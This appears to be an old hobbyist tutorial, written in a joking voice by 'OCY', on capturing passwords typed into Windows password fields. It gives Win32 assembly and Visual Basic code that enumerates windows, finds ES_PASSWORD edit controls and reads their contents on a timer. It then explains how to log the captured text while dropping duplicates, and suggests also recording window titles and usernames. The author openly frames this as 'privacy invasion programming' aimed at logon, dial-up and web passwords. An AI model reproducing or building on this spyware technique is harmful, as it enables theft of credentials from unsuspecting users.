Password Windows
Password windows - I love them, :) since any Windows programmer knows that we can easily grab the passwords - no complex programming needed.
Well, seems that the only person we have to blame this on is Gates, 'cos a password window is supposed to be SECURE. In other words, it has to be at least very hard to get the password typed in the window, but Gates's team of programmers only managed to hide those passwords in the form of asterisks... Although that is already very intimidating to most users, but remember, we are programmers, all those '******' can be retrieved, 'cos the M$ programmers didn't do their job well enough in terms of security.
I actually saw a few tonnes of programs which can reveal the text behind those *****'s, e.g. you see the true text typed in the password box instead of the ******'s. Anyway, OCY went far beyond that point a long time ago, 'cos OCY is a little more "naughty" than most of you... (snigger). The example code for this essay is my EditSpy2.zip.
Why password windows? What about keyboard hooks?
Ooooooh... good question. Answer to the first one: let me give you some examples of programs which use password windows: Windows's Log-On Demand (interested already?), Dial-Up networking dialouge, Netscape browser windows - you can get the passwords to e-mails, forums, porn sites... :) and a whole bunch of softwares. Are these interesting enough?
Answer to the secodn question: Yes, keyboard hooks work as well, but not in terms of memory and resources usage. And keyboard hooks are much more harder to code, and keyboard hooks generate too much data, and to avoid those unwanted data, we need to do a lot of extra coding... ( of course, good OCY will teach you how, but later... )
How to Detect a Password Window
Firstly, OCY tells you WHAT a password window is. Generally, a password window is an Edit control with a ES_PASSWORD style. Is it that simple? NO!!!!!! Alas, high level compilers like VB generate weird edit controls with weirdo, 'pontianak', strange classnames, such as "ThunderRT6TextBox" (VB6), instead of the immortal beloved "EDIT"... And this another sin commited by 'high-level' compilers, why generate different controls which operates similarly with the usual controls (and screw up the system to be tangled in deep, deep holes of DLL's. All those additional work involve so much windows subclassing, superclassing... and nobody sees the difference between a "ThunderRT6TextBox" and a plain and simple "EDIT" control.
Anyway, to recognize a password window, we just need to grab a window hWnd, and check for a ES_PASSWORD style, that is already accurate enough. ( Checking for those "ThunderRT6TextBox" or any other compiler generated controls is not needed most of the time... ) See, good OCY knows the simplest way most of the time... :)
To detect any kind of window, we need to enumerate all windows which exists, in programmers' words, we are going to call EnumWindows, and in the EnumWindowsProc, we call EnumChildWindows. ( Edit controls can only be child windows, don't you know that? ) Well, in the EnumChildProc, we make sure that the current child window is a password window - our beloved target... and here is the code ( in Win32 asm, somebody please translate to C++ / VB / whatever? )
EnumChildProc PROC hWnd:HWND,hOurWnd:HWND
.data
PasswordFound db 50 dup(0)
db 0
.code
pushad
pushf
Invoke IsPasswordWindow,hWnd
;check if it is a pwd window...
.if eax == TRUE ;if we
found a password edit box...
;get the text of the
password box
Invoke SendMessage,hWnd,WM_GETTEXT,50,addr
PasswordFound
;do the recording here...
.endif
continue_enum:
popf
popad
mov eax,TRUE
ret
EnumChildProc ENDP
Do you see the "IsPasswordWindow" call? It is no API, but my own procedure, it's job is do determine whether the given hWnd is a password window... and here it is... ( note that I include checking for VB6 text boxes and our regular Edit control )
; Function to determine whether a window
(handle given) is an password edit box
; ClassName == "Edit" or "ThunderRT6TextBox"
IsPasswordWindow PROC
hWnd:HWND
.data
EditClass1 db "Edit",0
EditClass2 db "ThunderRT6TextBox",0
;Vb6 text box
WinClassName db 50 dup(0)
db 0
.code
;determine whether the windows
is an edit box
Invoke GetClassName,hWnd,addr
WinClassName,50
;class name == "Edit"?
Invoke lstrcmp,addr EditClass1,addr
WinClassName
.if eax == 0
jmp check_password_style
.endif
;class name == "ThunderRT6TextBox"
? (VB6 edit box)
Invoke lstrcmp,addr EditClass2,addr
WinClassName
.if eax == 0
check_password_style:
Invoke GetWindowLong,hWnd,GWL_STYLE
test eax,ES_PASSWORD
;check for the ES_PASSWORD char
.if !zero?
;if zero flag NOT set, it has a ES_PASSWORD style
mov eax,TRUE
;return true if it is password box
ret
.else
mov eax,FALSE
;return false if it is not password box
ret
.endif
.endif
mov eax,FALSE ;it is not
password box, so return FALSE
ret
IsPasswordWindow ENDP
Well, you see the lines in bold? That is the CORE of password window detection! Those lines being translated to Visual Basic is something like this:
If GetWindowLong(hWnd,GWL_STYLE)
Or ES_PASSWORD Then
IsPasswordWindow
= True
Else
IsPasswordWindow
= FALSE
End If
Hey, this is sooooooooo simple, huh? ( Sorry for those who never speak in assembly language - I can't help you 'cos OCY don't speak in C++ either :-P ) Anyway, I still haven't tell you the MOST important thing: yep, you are right - recording the password typed. The EnumChildProc is actually triggered by a timer every 500 miliseconds ( should be fast enough to capture the passwords, huh? ), and the user is typing a password for a few seconds... So, since every half a second, the EnumChildProc will grab a different password. The question is: how can we know that WHICH is the right one??? Anyway, OCY always has his way to come around things... Leap on to ............ recording the passwords!
Recording The Passwords
Yeah, this is the crucial part... Before OCY preaches you on how to record ONLY the correct password, let's declare that privacy under Winbloze is officially dead... But 'maipontelek'! Winbloze is still ruling the market! Let's hope that M$ can come out with better operating systems ( in terms of security ), then if they still dominate the market, at least OCY has nothing else to say... I wonder, why such a poor quality OS can clinch to market so strongly?
Well, forget about the OS debate... Anyway, Gates is such a kind man - he gave us such a lousy OS so that ( 'naughty' ) programmers like OCY can do what they want easily... To record the passwords typed, OCY actually came out with this solution ( not perfect, though ):
Since the EnumChildProc is triggered every 500 miliseconds, we MUST NOT record the grabbed password everytime... ( that will blast off your hard disk in a few hours! ) Well, assumming that there is ONLY 1 password window at that time, we save a copy of the previous grabbed password. After the next 500 miliseconds, EnumChildProc is called again, then we compare the CURRENT password with the PREVIOUS password... If the both are NOT equal, we record only the CURRENT password.
What?!?!?! You don't understand??? Never mind, I expected that, let me give you a clear example, imagine that we have the Dial-Up Networking dialouge ( like the one on top of this page ) activated, and there is only 1 password window which exists on the system right now... After 500 ms, EnumChildProc is triggered, and it grabs a password, say "ocy password". And it is stored in the CurrentPwd string variable. Then, CurrentPwd is compared to PreviousPwd...
1.
PreviousPwd = ""
CurrentPwd = "ocy password"
Result: CurrentPwd != PreviousPwd, record CurrentPwd
PreviousPwd = CurrentPwd
Now, after another 500ms, EnumChildProc is called again... This time, OCY typed a few more keys into the password window, so EnumChildProc grabbed "ocy password is 123" ...
2.
PreviousPwd = "ocy password"
CurrentPwd = "ocy password is 123"
Result: CurrentPwd != PreviousPwd, record CurrentPwd
PreviousPwd = CurrentPwd
Well, after another 500 ms (again!), EnumChildProc jumps into action again, this time, OCY does not type anything new, 'cos that he has finished typing his password, and he is ready to click the "Connect" button on the Dial-Up Networking dialouge... So, the current password is still "ocy password is 123".
3.
PreviousPwd = "ocy password is 123"
CurrentPwd = "ocy password is 123"
Result: CurrentPwd = PreviousPwd, do nothing
Well, that is still very simple, huh? Of course, good OCY is not very good all the time - 'cos he decides to leave some work for you to do yourself! A new question arises: What if we have MORE than 1 password window at the same time??? Fine... That is what I want you do sort it out yourself, anyway it is easy. And another ntoe of caution: I prefer clearing ALL the log file's contents first before making a new recording, so that the log file's size isn't too monstrous. Well, if you don't do that you get the following file:
ocy
password <- First recording
ocy
password is 123 <- Second recording
ocy
password is 12345 <- 3rd recording and so on...
.
.
.
Well, if you clear the contents everytime before you write anything to the log file, you get this:
ocy password is 12345
and that is much more clearer than the first one, 'cos in the first one, we have to figure it out ourselves which is the correct password ( "ocy password" or "ocy password is 123" ? ) Besides, you always get a bigger file with the first one.
Urmmmmmph... Maybe OCY has nothing else left to talk about password windows, 'cos this only the "Beginner" level of privacy invasion programming! I decided NOT to release OCY's own beloved tool of the trade - instead I will only let you have my EditSpy2.zip source for reference only ( EditSpy2 doesn't incorporate recording to log files ). Anyway, I already give you the most important element of password windows - the right knowledge. As I said, I encourage creativity, what I present should only be reference material only, who knows that if you can come up with a better way to detect password windows, or another way to record ONLY the correct password... etc ? Anyway, OCY knows that some programmers like OCY himself, are lazy, so the only way to make them learn is to give them 'crippled' example codes, so that they can build their own programs. Hey, you are a programmer, why should you use my code 100% when you already have the ability to code?
Other Ideas
Hey, even somebody like OCY who never grow up in a creative environment have to give you ideas? Never mind, OCY is very creative, his ideas is somehow useful :-). Well, as you can see, if we only see the "ocy password is 12345", and do not know what the password is for, what the hell are we going to do with the password?
Hence, OCY suggests that you should record the password window's parent window's text, using the example window on this page, we should record something like:
-<
Connect To >-
Password
recorded: ocy password is 12345
Now, the log file looks more readable. Who wants a log file with tonnes of information but totally uncomprehensible, right? And recording the username is (and anything in other edit boxes) is always useful...
Second idea... Urmmmmph, think it yourself... :)
-
by the unorthodox OCY